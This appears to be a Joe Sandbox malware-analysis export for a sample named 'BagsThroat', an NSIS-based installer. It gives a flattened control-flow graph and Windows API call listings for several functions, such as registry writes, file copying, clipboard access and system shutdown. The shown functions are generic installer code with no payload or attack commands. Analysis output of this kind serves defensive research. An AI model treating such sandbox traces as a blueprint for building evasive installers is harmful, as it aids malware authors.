4657->4658 4661 405f7d wsprintfW 4657->4661 4660->4657 4661->4658 4662 4029ff 4663 401553 19 API calls 4662->4663 4664 402a09 4663->4664 4665 40145c 18 API calls 4664->4665 4666 402a12 4665->4666 4667 402a1f RegQueryValueExW 4666->4667 4671 401a13 4666->4671 4668 402a45 4667->4668 4669 402a3f 4667->4669 4670 4029e4 RegCloseKey 4668->4670 4668->4671 4669->4668 4673 405f7d wsprintfW 4669->4673 4670->4671 4673->4668 4674 401000 4675 401037 BeginPaint GetClientRect 
4674->4675 4676 40100c DefWindowProcW 4674->4676 4678 4010fc 4675->4678 4679 401182 4676->4679 4680 401073 CreateBrushIndirect FillRect DeleteObject 4678->4680 4681 401105 4678->4681 4680->4678 4682 401170 EndPaint 4681->4682 4683 40110b CreateFontIndirectW 4681->4683 4682->4679 4683->4682 4684 40111b 6 API calls 4683->4684 4684->4682 4685 401f80 4686 401446 18 API calls 4685->4686 4687 401f88 4686->4687 4688 401446 18 API calls 4687->4688 4689 401f93 4688->4689 4690 401fa3 4689->4690 4691 40145c 18 API calls 4689->4691 4692 401fb3 4690->4692 4693 40145c 18 API calls 4690->4693 4691->4690 4694 402006 4692->4694 4695 401fbc 4692->4695 4693->4692 4696 40145c 18 API calls 4694->4696 4697 401446 18 API calls 4695->4697 4698 40200d 4696->4698 4699 401fc4 4697->4699 4701 40145c 18 API calls 4698->4701 4700 401446 18 API calls 4699->4700 4702 401fce 4700->4702 4703 402016 FindWindowExW 4701->4703 4704 401ff6 SendMessageW 4702->4704 4705 401fd8 SendMessageTimeoutW 4702->4705 4707 402036 4703->4707 4704->4707 4705->4707 4706 4030e3 4707->4706 4709 405f7d wsprintfW 4707->4709 4709->4706 4710 402880 4711 402884 4710->4711 4712 40145c 18 API calls 4711->4712 4713 4028a7 4712->4713 4714 40145c 18 API calls 4713->4714 4715 4028b1 4714->4715 4716 4028ba RegCreateKeyExW 4715->4716 4717 4028e8 4716->4717 4722 4029ef 4716->4722 4718 402934 4717->4718 4720 40145c 18 API calls 4717->4720 4719 402963 4718->4719 4721 401446 18 API calls 4718->4721 4723 4029ae RegSetValueExW 4719->4723 4726 40337f 33 API calls 4719->4726 4724 4028fc lstrlenW 4720->4724 4725 402947 4721->4725 4729 4029c6 RegCloseKey 4723->4729 4730 4029cb 4723->4730 4727 402918 4724->4727 4728 40292a 4724->4728 4732 4062cf 11 API calls 4725->4732 4733 40297b 4726->4733 4734 4062cf 11 API calls 4727->4734 4735 4062cf 11 API calls 4728->4735 4729->4722 4731 4062cf 11 API calls 4730->4731 4731->4729 4732->4719 4741 406250 4733->4741 4738 402922 4734->4738 4735->4718 4738->4723 4740 4062cf 11 API calls 4740->4738 4742 406273 
4741->4742 4743 4062b6 4742->4743 4744 406288 wsprintfW 4742->4744 4745 402991 4743->4745 4746 4062bf lstrcatW 4743->4746 4744->4743 4744->4744 4745->4740 4746->4745 4747 403d02 4748 403d0d 4747->4748 4749 403d11 4748->4749 4750 403d14 GlobalAlloc 4748->4750 4750->4749 4751 402082 4752 401446 18 API calls 4751->4752 4753 402093 SetWindowLongW 4752->4753 4754 4030e3 4753->4754 4755 402a84 4756 401553 19 API calls 4755->4756 4757 402a8e 4756->4757 4758 401446 18 API calls 4757->4758 4759 402a98 4758->4759 4760 401a13 4759->4760 4761 402ab2 RegEnumKeyW 4759->4761 4762 402abe RegEnumValueW 4759->4762 4763 402a7e 4761->4763 4762->4760 4762->4763 4763->4760 4764 4029e4 RegCloseKey 4763->4764 4764->4760 4765 402c8a 4766 402ca2 4765->4766 4767 402c8f 4765->4767 4769 40145c 18 API calls 4766->4769 4768 401446 18 API calls 4767->4768 4771 402c97 4768->4771 4770 402ca9 lstrlenW 4769->4770 4770->4771 4772 401a13 4771->4772 4773 402ccb WriteFile 4771->4773 4773->4772 4774 401d8e 4775 40145c 18 API calls 4774->4775 4776 401d95 ExpandEnvironmentStringsW 4775->4776 4777 401da8 4776->4777 4778 401db9 4776->4778 4777->4778 4779 401dad lstrcmpW 4777->4779 4779->4778 4780 401e0f 4781 401446 18 API calls 4780->4781 4782 401e17 4781->4782 4783 401446 18 API calls 4782->4783 4784 401e21 4783->4784 4785 4030e3 4784->4785 4787 405f7d wsprintfW 4784->4787 4787->4785 4788 40438f 4789 4043c8 4788->4789 4790 40439f 4788->4790 4791 403df6 8 API calls 4789->4791 4792 403d6b 19 API calls 4790->4792 4794 4043d4 4791->4794 4793 4043ac SetDlgItemTextW 4792->4793 4793->4789 4795 403f90 4796 403fa0 4795->4796 4797 403fbc 4795->4797 4806 405cb0 GetDlgItemTextW 4796->4806 4799 403fc2 SHGetPathFromIDListW 4797->4799 4800 403fef 4797->4800 4802 403fd2 4799->4802 4805 403fd9 SendMessageW 4799->4805 4801 403fad SendMessageW 4801->4797 4803 40141d 80 API calls 4802->4803 4803->4805 4805->4800 4806->4801 4807 402392 4808 40145c 18 API calls 4807->4808 4809 402399 4808->4809 4812 407224 4809->4812 4813 406efe 
25 API calls 4812->4813 4814 407244 4813->4814 4815 4023a7 4814->4815 4816 40724e lstrcpynW lstrcmpW 4814->4816 4817 407280 4816->4817 4818 407286 lstrcpynW 4816->4818 4817->4818 4818->4815 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3402 406113 3360->3402 3379 40683e 3363->3379 3364 406aab 3365 401488 3364->3365 3397 406035 lstrcpynW 3364->3397 3365->3358 3381 406064 3365->3381 3367 4068ff GetVersion 3367->3379 3368 406a72 lstrlenW 3368->3379 3370 406831 10 API calls 3370->3368 3373 40697e GetSystemDirectoryW 3373->3379 3374 406064 5 API calls 3374->3379 3375 406991 GetWindowsDirectoryW 3375->3379 3376 406831 10 API calls 3376->3379 3377 406a0b lstrcatW 3377->3379 3378 4069c5 SHGetSpecialFolderLocation 3378->3379 3380 4069dd SHGetPathFromIDListW CoTaskMemFree 3378->3380 3379->3364 3379->3367 3379->3368 3379->3370 3379->3373 3379->3374 3379->3375 3379->3376 3379->3377 3379->3378 3390 405eff RegOpenKeyExW 3379->3390 3395 405f7d wsprintfW 3379->3395 3396 406035 lstrcpynW 3379->3396 3380->3379 3388 406071 3381->3388 3382 4060e7 3383 4060ed CharPrevW 3382->3383 3385 40610d 3382->3385 3383->3382 3384 4060da CharNextW 3384->3382 3384->3388 3385->3358 3387 4060c6 CharNextW 3387->3388 3388->3382 3388->3384 3388->3387 3389 4060d5 CharNextW 3388->3389 3398 405d32 3388->3398 3389->3384 3391 405f33 RegQueryValueExW 3390->3391 3392 405f78 3390->3392 3393 405f55 RegCloseKey 3391->3393 3392->3379 3393->3392 3395->3379 3396->3379 3397->3365 3399 405d38 3398->3399 3400 405d4e 3399->3400 3401 405d3f CharNextW 3399->3401 3400->3388 3401->3399 3403 40613c 3402->3403 3404 40611f 3402->3404 3406 4061b3 
3403->3406 3407 406159 3403->3407 3408 40277f WritePrivateProfileStringW 3403->3408 3405 406129 CloseHandle 3404->3405 3404->3408 3405->3408 3406->3408 3409 4061bc lstrcatW lstrlenW WriteFile 3406->3409 3407->3409 3410 406162 GetFileAttributesW 3407->3410 3409->3408 3415 405e7c GetFileAttributesW CreateFileW 3410->3415 3412 40617e 3412->3408 3413 4061a8 SetFilePointer 3412->3413 3414 40618e WriteFile 3412->3414 3413->3406 3414->3413 3415->3412 4819 402797 4820 40145c 18 API calls 4819->4820 4821 4027ae 4820->4821 4822 40145c 18 API calls 4821->4822 4823 4027b7 4822->4823 4824 40145c 18 API calls 4823->4824 4825 4027c0 GetPrivateProfileStringW lstrcmpW 4824->4825 4826 401e9a 4827 40145c 18 API calls 4826->4827 4828 401ea1 4827->4828 4829 401446 18 API calls 4828->4829 4830 401eab wsprintfW 4829->4830 3790 401a1f 3791 40145c 18 API calls 3790->3791 3792 401a26 3791->3792 3793 4062cf 11 API calls 3792->3793 3794 401a49 3793->3794 3795 401a64 3794->3795 3796 401a5c 3794->3796 3865 406035 lstrcpynW 3795->3865 3864 406035 lstrcpynW 3796->3864 3799 401a6f 3866 40674e lstrlenW CharPrevW 3799->3866 3800 401a62 3803 406064 5 API calls 3800->3803 3834 401a81 3803->3834 3804 406301 2 API calls 3804->3834 3807 401a98 CompareFileTime 3807->3834 3808 401ba9 3809 404f9e 25 API calls 3808->3809 3811 401bb3 3809->3811 3810 401b5d 3812 404f9e 25 API calls 3810->3812 3843 40337f 3811->3843 3814 401b70 3812->3814 3818 4062cf 11 API calls 3814->3818 3816 406035 lstrcpynW 3816->3834 3817 4062cf 11 API calls 3819 401bda 3817->3819 3823 401b8b 3818->3823 3820 401be9 SetFileTime 3819->3820 3821 401bf8 CloseHandle 3819->3821 3820->3821 3821->3823 3824 401c09 3821->3824 3822 406831 18 API calls 3822->3834 3825 401c21 3824->3825 3826 401c0e 3824->3826 3827 406831 18 API calls 3825->3827 3828 406831 18 API calls 3826->3828 3829 401c29 3827->3829 3831 401c16 lstrcatW 3828->3831 3832 4062cf 11 API calls 3829->3832 3831->3829 3835 401c34 3832->3835 3833 401b50 3837 401b93 3833->3837 3838 401b53 
3833->3838 3834->3804 3834->3807 3834->3808 3834->3810 3834->3816 3834->3822 3834->3833 3836 4062cf 11 API calls 3834->3836 3842 405e7c GetFileAttributesW CreateFileW 3834->3842 3869 405e5c GetFileAttributesW 3834->3869 3872 405ccc 3834->3872 3839 405ccc MessageBoxIndirectW 3835->3839 3836->3834 3840 4062cf 11 API calls 3837->3840 3841 4062cf 11 API calls 3838->3841 3839->3823 3840->3823 3841->3810 3842->3834 3844 40339a 3843->3844 3845 4033c7 3844->3845 3878 403368 SetFilePointer 3844->3878 3876 403336 ReadFile 3845->3876 3849 401bc6 3849->3817 3850 403546 3852 40354a 3850->3852 3853 40356e 3850->3853 3851 4033eb GetTickCount 3851->3849 3856 403438 3851->3856 3854 403336 ReadFile 3852->3854 3853->3849 3857 403336 ReadFile 3853->3857 3858 40358d WriteFile 3853->3858 3854->3849 3855 403336 ReadFile 3855->3856 3856->3849 3856->3855 3860 40348a GetTickCount 3856->3860 3861 4034af MulDiv wsprintfW 3856->3861 3863 4034f3 WriteFile 3856->3863 3857->3853 3858->3849 3859 4035a1 3858->3859 3859->3849 3859->3853 3860->3856 3862 404f9e 25 API calls 3861->3862 3862->3856 3863->3849 3863->3856 3864->3800 3865->3799 3867 401a75 lstrcatW 3866->3867 3868 40676b lstrcatW 3866->3868 3867->3800 3868->3867 3870 405e79 3869->3870 3871 405e6b SetFileAttributesW 3869->3871 3870->3834 3871->3870 3873 405ce1 3872->3873 3874 405d2f 3873->3874 3875 405cf7 MessageBoxIndirectW 3873->3875 3874->3834 3875->3874 3877 403357 3876->3877 3877->3849 3877->3850 3877->3851 3878->3845 4831 40209f GetDlgItem GetClientRect 4832 40145c 18 API calls 4831->4832 4833 4020cf LoadImageW SendMessageW 4832->4833 4834 4030e3 4833->4834 4835 4020ed DeleteObject 4833->4835 4835->4834 4836 402b9f 4837 401446 18 API calls 4836->4837 4841 402ba7 4837->4841 4838 402c4a 4839 402bdf ReadFile 4839->4841 4848 402c3d 4839->4848 4840 401446 18 API calls 4840->4848 4841->4838 4841->4839 4842 402c06 MultiByteToWideChar 4841->4842 4843 402c3f 4841->4843 4844 402c4f 4841->4844 4841->4848 4842->4841 4842->4844 4849 405f7d 
wsprintfW 4843->4849 4846 402c6b SetFilePointer 4844->4846 4844->4848 4846->4848 4847 402d17 ReadFile 4847->4848 4848->4838 4848->4840 4848->4847 4849->4838 4850 402b23 GlobalAlloc 4851 402b39 4850->4851 4852 402b4b 4850->4852 4853 401446 18 API calls 4851->4853 4854 40145c 18 API calls 4852->4854 4856 402b41 4853->4856 4855 402b52 WideCharToMultiByte lstrlenA 4854->4855 4855->4856 4857 402b84 WriteFile 4856->4857 4858 402b93 4856->4858 4857->4858 4859 402384 GlobalFree 4857->4859 4859->4858 4861 4040a3 4862 4040b0 lstrcpynW lstrlenW 4861->4862 4863 4040ad 4861->4863 4863->4862 3429 4054a5 3430 4055f9 3429->3430 3431 4054bd 3429->3431 3433 40564a 3430->3433 3434 40560a GetDlgItem GetDlgItem 3430->3434 3431->3430 3432 4054c9 3431->3432 3436 4054d4 SetWindowPos 3432->3436 3437 4054e7 3432->3437 3435 4056a4 3433->3435 3443 40139d 80 API calls 3433->3443 3438 403d6b 19 API calls 3434->3438 3444 4055f4 3435->3444 3499 403ddb 3435->3499 3436->3437 3440 405504 3437->3440 3441 4054ec ShowWindow 3437->3441 3442 405634 SetClassLongW 3438->3442 3445 405526 3440->3445 3446 40550c DestroyWindow 3440->3446 3441->3440 3447 40141d 80 API calls 3442->3447 3450 40567c 3443->3450 3448 40552b SetWindowLongW 3445->3448 3449 40553c 3445->3449 3451 405908 3446->3451 3447->3433 3448->3444 3452 4055e5 3449->3452 3453 405548 GetDlgItem 3449->3453 3450->3435 3454 405680 SendMessageW 3450->3454 3451->3444 3460 405939 ShowWindow 3451->3460 3519 403df6 3452->3519 3457 405578 3453->3457 3458 40555b SendMessageW IsWindowEnabled 3453->3458 3454->3444 3455 40141d 80 API calls 3468 4056b6 3455->3468 3456 40590a DestroyWindow KiUserCallbackDispatcher 3456->3451 3462 405585 3457->3462 3465 4055cc SendMessageW 3457->3465 3466 405598 3457->3466 3474 40557d 3457->3474 3458->3444 3458->3457 3460->3444 3461 406831 18 API calls 3461->3468 3462->3465 3462->3474 3464 403d6b 19 API calls 3464->3468 3465->3452 3469 4055a0 3466->3469 3470 4055b5 3466->3470 3467 4055b3 3467->3452 3468->3444 3468->3455 3468->3456 
3468->3461 3468->3464 3490 40584a DestroyWindow 3468->3490 3502 403d6b 3468->3502 3513 40141d 3469->3513 3471 40141d 80 API calls 3470->3471 3473 4055bc 3471->3473 3473->3452 3473->3474 3516 403d44 3474->3516 3476 405731 GetDlgItem 3477 405746 3476->3477 3478 40574f ShowWindow KiUserCallbackDispatcher 3476->3478 3477->3478 3505 403db1 KiUserCallbackDispatcher 3478->3505 3480 405779 EnableWindow 3483 40578d 3480->3483 3481 405792 GetSystemMenu EnableMenuItem SendMessageW 3482 4057c2 SendMessageW 3481->3482 3481->3483 3482->3483 3483->3481 3506 403dc4 SendMessageW 3483->3506 3507 406035 lstrcpynW 3483->3507 3486 4057f0 lstrlenW 3487 406831 18 API calls 3486->3487 3488 405806 SetWindowTextW 3487->3488 3508 40139d 3488->3508 3490->3451 3491 405864 CreateDialogParamW 3490->3491 3491->3451 3492 405897 3491->3492 3493 403d6b 19 API calls 3492->3493 3494 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3493->3494 3495 40139d 80 API calls 3494->3495 3496 4058e8 3495->3496 3496->3444 3497 4058f0 ShowWindow 3496->3497 3498 403ddb SendMessageW 3497->3498 3498->3451 3500 403df3 3499->3500 3501 403de4 SendMessageW 3499->3501 3500->3468 3501->3500 3503 406831 18 API calls 3502->3503 3504 403d76 SetDlgItemTextW 3503->3504 3504->3476 3505->3480 3506->3483 3507->3486 3511 4013a4 3508->3511 3509 401410 3509->3468 3511->3509 3512 4013dd MulDiv SendMessageW 3511->3512 3533 4015a0 3511->3533 3512->3511 3514 40139d 80 API calls 3513->3514 3515 401432 3514->3515 3515->3474 3517 403d51 SendMessageW 3516->3517 3518 403d4b 3516->3518 3517->3467 3518->3517 3520 403e0b GetWindowLongW 3519->3520 3530 403e94 3519->3530 3521 403e1c 3520->3521 3520->3530 3522 403e2b GetSysColor 3521->3522 3523 403e2e 3521->3523 3522->3523 3524 403e34 SetTextColor 3523->3524 3525 403e3e SetBkMode 3523->3525 3524->3525 3526 403e56 GetSysColor 3525->3526 3527 403e5c 3525->3527 3526->3527 3528 403e63 SetBkColor 3527->3528 3529 403e6d 3527->3529 3528->3529 3529->3530 3531 403e80 DeleteObject 3529->3531 3532 
403e87 CreateBrushIndirect 3529->3532 3530->3444 3531->3532 3532->3530 3534 4015fa 3533->3534 3613 40160c 3533->3613 3535 401601 3534->3535 3536 401742 3534->3536 3537 401962 3534->3537 3538 4019ca 3534->3538 3539 40176e 3534->3539 3540 401650 3534->3540 3541 4017b1 3534->3541 3542 401672 3534->3542 3543 401693 3534->3543 3544 401616 3534->3544 3545 4016d6 3534->3545 3546 401736 3534->3546 3547 401897 3534->3547 3548 4018db 3534->3548 3549 40163c 3534->3549 3550 4016bd 3534->3550 3534->3613 3559 4062cf 11 API calls 3535->3559 3551 401751 ShowWindow 3536->3551 3552 401758 3536->3552 3556 40145c 18 API calls 3537->3556 3563 40145c 18 API calls 3538->3563 3553 40145c 18 API calls 3539->3553 3577 4062cf 11 API calls 3540->3577 3557 40145c 18 API calls 3541->3557 3554 40145c 18 API calls 3542->3554 3558 401446 18 API calls 3543->3558 3562 40145c 18 API calls 3544->3562 3576 401446 18 API calls 3545->3576 3545->3613 3546->3613 3667 405f7d wsprintfW 3546->3667 3555 40145c 18 API calls 3547->3555 3560 40145c 18 API calls 3548->3560 3564 401647 PostQuitMessage 3549->3564 3549->3613 3561 4062cf 11 API calls 3550->3561 3551->3552 3565 401765 ShowWindow 3552->3565 3552->3613 3566 401775 3553->3566 3567 401678 3554->3567 3568 40189d 3555->3568 3569 401968 GetFullPathNameW 3556->3569 3570 4017b8 3557->3570 3571 40169a 3558->3571 3559->3613 3572 4018e2 3560->3572 3573 4016c7 SetForegroundWindow 3561->3573 3574 40161c 3562->3574 3575 4019d1 SearchPathW 3563->3575 3564->3613 3565->3613 3579 4062cf 11 API calls 3566->3579 3580 4062cf 11 API calls 3567->3580 3658 406301 FindFirstFileW 3568->3658 3582 4019a1 3569->3582 3583 40197f 3569->3583 3584 4062cf 11 API calls 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 40145c 18 API calls 3572->3586 3573->3613 3587 4062cf 11 API calls 3574->3587 3575->3546 3575->3613 3576->3613 3588 401664 3577->3588 3589 401785 SetFileAttributesW 3579->3589 3590 401683 3580->3590 3602 4019b8 GetShortPathNameW 3582->3602 3582->3613 3583->3582 3608 

                                        Control-flow Graph (function 004050F9; graph data not rendered)
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                        • GetClientRect.USER32(?,?), ref: 004051C2
                                        • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                        • ShowWindow.USER32(?,00000008), ref: 00405266
                                        • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                        • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                          • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,759223A0,00000000), ref: 00406902
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                        • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                        • ShowWindow.USER32(00000000), ref: 00405313
                                        • ShowWindow.USER32(?,00000008), ref: 00405318
                                        • ShowWindow.USER32(00000008), ref: 0040535F
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                        • CreatePopupMenu.USER32 ref: 004053A2
                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                        • GetWindowRect.USER32(?,?), ref: 004053CA
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                        • OpenClipboard.USER32(00000000), ref: 00405437
                                        • EmptyClipboard.USER32 ref: 0040543D
                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                        • GlobalLock.KERNEL32(00000000), ref: 00405453
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                        • CloseClipboard.USER32 ref: 0040549A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                        • String ID: New install of "%s" to "%s"${
                                        • API String ID: 2110491804-1641061399
                                        • Opcode ID: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                        • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                        • Opcode Fuzzy Hash: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                        • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                        Control-flow Graph (function 004038AF; graph data not rendered)
                                        APIs
                                        • #17.COMCTL32 ref: 004038CE
                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                        • OleInitialize.OLE32(00000000), ref: 004038E0
                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                        • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                        • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                        • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                        • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                        • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                        • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                        • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                        • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                        • CoUninitialize.COMBASE(?), ref: 00403AFD
                                        • ExitProcess.KERNEL32 ref: 00403B1D
                                        • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                        • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                        • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                        • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                        • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                        • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                        • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                        • API String ID: 2435955865-3712954417
                                        • Opcode ID: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
                                        • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                        • Opcode Fuzzy Hash: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
                                        • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                        Control-flow Graph (function 00406831; graph data not rendered)
                                        APIs
                                        • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,759223A0,00000000), ref: 00406902
                                        • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                        • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                        • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                        • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,759223A0,00000000), ref: 00406A73
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
